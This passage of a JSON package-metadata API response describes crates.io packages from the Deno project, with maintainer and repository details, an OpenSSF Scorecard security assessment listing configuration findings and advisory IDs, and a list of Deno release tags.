/api/v1/registries/crates.io/packages/deno_console/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_console/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_console/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:22.553Z","updated_at":"2022-11-07T18:29:22.553Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:28.826Z","updated_at":"2023-07-18T22:41:28.826Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047952,"name":"deno-x86_64-pc-windows-msvc","ecosystem":"cargo","description":"Binary dependencies for the 'deno' crate","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":31,"first_release_published_at":"2019-03-31T19:51:56.257Z","latest_release_published_at":"2019-11-05T00:59:54.916Z","latest_release_number":"0.23.0","last_synced_at":"2026-08-29T21:57:11.795Z","created_at":"2022-04-12T10:03:05.856Z","updated_at":"2026-08-29T21:57:11.795Z","registry_url":"https://crates.io/crates/deno-x86_64-pc-windows-msvc/","install_command":"cargo install deno-x86_64-pc-windows-msvc","documentation_url":"https://docs.rs/deno-x86_64-pc-windows-msvc/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8